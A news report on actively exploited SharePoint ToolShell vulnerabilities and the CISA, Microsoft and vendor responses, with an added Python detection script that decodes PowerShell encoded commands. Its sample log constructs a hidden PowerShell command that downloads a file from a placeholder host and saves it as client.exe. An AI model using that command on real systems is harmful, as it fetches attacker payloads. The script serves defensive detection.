The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two critical Microsoft SharePoint vulnerabilities—CVE-2025-49704 and CVE-2025-49706—to its Known Exploited Vulnerabilities (KEV) catalog as of July 22, 2025, following confirmed evidence of active exploitation. In response, Federal Civilian Executive Branch (FCEB) agencies have been directed to address the vulnerabilities by July 23, 2025.
“CISA is aware of active exploitation of a spoofing and RCE vulnerability chain involving CVE-2025-49706 and CVE-2025-49704, enabling unauthorized access to on-premise SharePoint servers,” the agency said in a public advisory.
These flaws, part of a broader exploit chain referred to as ToolShell, are now linked to Chinese state-backed groups, including Linen Typhoon and Violet Typhoon, which have been exploiting the vulnerabilities since early July 2025, according to Microsoft. The two bugs include a remote code execution (RCE) issue and a post-authentication spoofing flaw, both of which can allow attackers to gain elevated access to SharePoint environments.
Microsoft has officially acknowledged CVE-2025-53770 as actively exploited in the wild and provided further descriptions of four related flaws:
CVE-2025-49704 – SharePoint Remote Code Execution
CVE-2025-49706 – SharePoint Post-auth Remote Code Execution
CVE-2025-53770 – ToolShell Authentication Bypass & RCE
CVE-2025-53771 – ToolShell Path Traversal
According to Akamai researchers, “The root cause [of CVE-2025-53770] is a combination of two bugs: An authentication bypass (CVE-2025-49706) and an insecure deserialization vulnerability (CVE-2025-49704).”
Threat actors have been seen deploying web shells, extracting MachineKey data, and executing encoded PowerShell commands to download malicious files such as “client.exe,” disguised as benign files like “debug.js.” Symantec reported that the binary is used to launch scripts that gather system and cryptographic information.
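As an added defender-side example (not code from the article or from any vendor named in it), the following Python decodes the base64/UTF-16LE argument of PowerShell -EncodedCommand invocations found in process-creation log lines and flags any decoded script that names the files the article reports, client.exe or debug.js. The log lines, host name and URL are constructed placeholders, and the indicator list is an assumption drawn from the article rather than a complete signature.

```python
import base64
import re
from typing import List, Optional, Tuple

# Filenames the article reports for this campaign (assumed indicator list).
INDICATORS = ("client.exe", "debug.js")

# Matches -e, -ec, -enc or -EncodedCommand (PowerShell accepts any unambiguous
# prefix, case-insensitively) followed by the base64 argument.
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def encode_command(text: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or odd byte count
        return None


def scan_lines(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line_number, decoded_script, matched_indicators) for flagged lines."""
    findings = []
    for n, line in enumerate(lines, start=1):
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        hits = [ioc for ioc in INDICATORS if ioc in decoded.lower()]
        if hits:
            findings.append((n, decoded, hits))
    return findings


# Constructed sample process-creation log lines (not from the article). The
# third line carries an encoded command that fetches "debug.js" and stores it
# as "client.exe"; the host name and URL are placeholders.
SAMPLE_LOG = [
    "2025-07-20T10:01:02Z host=SP01 parent=w3wp.exe cmd=powershell.exe -NoProfile -Command Get-Date",
    "2025-07-20T10:01:05Z host=SP01 parent=explorer.exe cmd=notepad.exe C:\\notes.txt",
    "2025-07-20T10:02:11Z host=SP01 parent=w3wp.exe cmd=powershell.exe -nop -w hidden -enc "
    + encode_command("Invoke-WebRequest http://example.invalid/debug.js -OutFile $env:TEMP\\client.exe"),
]

if __name__ == "__main__":
    for n, decoded, hits in scan_lines(SAMPLE_LOG):
        print(f"line {n}: matched {hits}: {decoded}")
```

The parent-process field is left in the sample because a PowerShell child of the SharePoint worker process w3wp.exe is itself worth reviewing, even when the decoded script matches no listed indicator.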
Security firm watchTowr revealed it can exploit CVE-2025-53770 to bypass Microsoft’s Antimalware Scan Interface (AMSI) mitigation. “AMSI was never a silver bullet… But we’re concerned to hear that some organizations are choosing to ‘enable AMSI’ instead of patching. This is a very bad idea,” warned CEO Benjamin Harris.
CISA’s Chris Butera confirmed the agency is collaborating with Microsoft and other partners. “CISA continues to work in lockstep with Microsoft, as well as federal and other partners, to address and mitigate the active exploitation of multiple vulnerabilities impacting Microsoft on-site SharePoint servers.”
Current estimates suggest around 400 organizations, including federal agencies and state, local, tribal, and territorial (SLTT) partners, have been compromised in this wave of exploitation.